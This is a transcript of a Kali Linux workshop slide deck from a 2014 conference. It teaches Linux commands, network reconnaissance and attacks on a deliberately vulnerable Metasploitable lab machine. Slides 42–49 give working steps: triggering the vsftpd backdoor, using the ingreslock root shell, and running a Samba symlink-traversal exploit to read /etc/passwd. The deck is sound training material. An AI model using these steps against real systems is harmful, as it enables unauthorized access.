1 / 92

Kali Linux

Kali Linux. Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge. Welcome – Salt Fork 2014.

corbettr
Download Presentation

Kali Linux

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge

  2. Welcome – Salt Fork 2014

  3. Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics. Welcome

  4. Who or What is ‘Kali’?

  5. Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli Who is Kali?

  6. Hindu Kali

  7. Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. What is Kali Linux?

  8. /books • Official Kali Guide • eForensics • /media • 7-Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager • /metaspolitable • /PPT What’s on the DVD?

  9. http://www.kali.org/

  10.  We’re going to type something  We’re going to make a note  Might be a question?  We’re going to click on something  Recon  Attack Legend

  11. Ready?

  12. Use your powers for good

  13. - Let’s make a folder called  kali_2014 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let’s make sure the virtual environments are working and can ‘ping’ each other Getting Ready…

  14. Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications. VMware Player

  15. Kali Login root Kali Password password Metaspolitable Login msfadmin Metaspolitable Password msfadmin Logins / Passwords

  16. Login msfadmin • Password msfadmin ifconfig • Jot down the IP & Netmask route • Jot down the Gateway Metaspolitable V/E

  17. Virtual Environment #1 • Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx Metaspolitable V/E

  18. Login root • Password password  ifconfig • Jot down the IP & Netmask  route • Jot down the Gateway Kali V/E

  19. Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply] Kali V/E

  20. From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation. Kali Updating

  21. Are we good?

  22. Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services There are several categories

  23. Metapackages also exist

  24. Command Line Tools Presentation on Kali Linux

  25.  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back? ping

  26.  top Tells us what services are running, processes, memory allocation Basically, a live system monitor top

  27.  df Tells us how much space is available or ‘disk free’ df

  28.  du Tells us how much space is taken or ‘disk used’. You can get a shorter report by…  ‘du –s’ … (disk used –summary) du

  29.  free How much ‘free’ memory is available free

  30.  ls This is for ‘list’  ls –l (list –long)  ls -la (list – long – all attributes) ls

  31.  pwd Directory structure Means ‘path to working directory’ or ‘print working directory’ pwd

  32.  ps • Means ‘Process Status’ • aux – auxiliary view • pstree – shows parent/child relationships • Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID) ps / ps aux / pstree

  33. Both Environments Presentation on Kali Linux

  34. Virtual Environment #1 (Metaspolitable) • Go to TERMINAL • ifconfig • …jot this number down… • Virtual Environment #2 (Kali) • Go to TERMINAL • ifconfig • …jot this number down… Can you ‘ping’ each other?

  35. CLI & Services Presentation on Kali Linux

  36.  traceroute Essentially, ‘tracert’ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network traceroute

  37. nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network nmap

  38. nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack. nmap

  39.  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. rlogin (from Metaspolitable)

  40. rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host. rpcinfo

  41.  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter. showmount

  42.  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP telnet

  43.  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server telnet

  44.  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO. telnet

  45.  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP. telnet

  46. Are we good?

  47.  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp smbclient

  48.  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit smbclient

  49.  smbclient //<Target IP>/tmp Do you get the 'smb: \>' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts? smbclient

More Related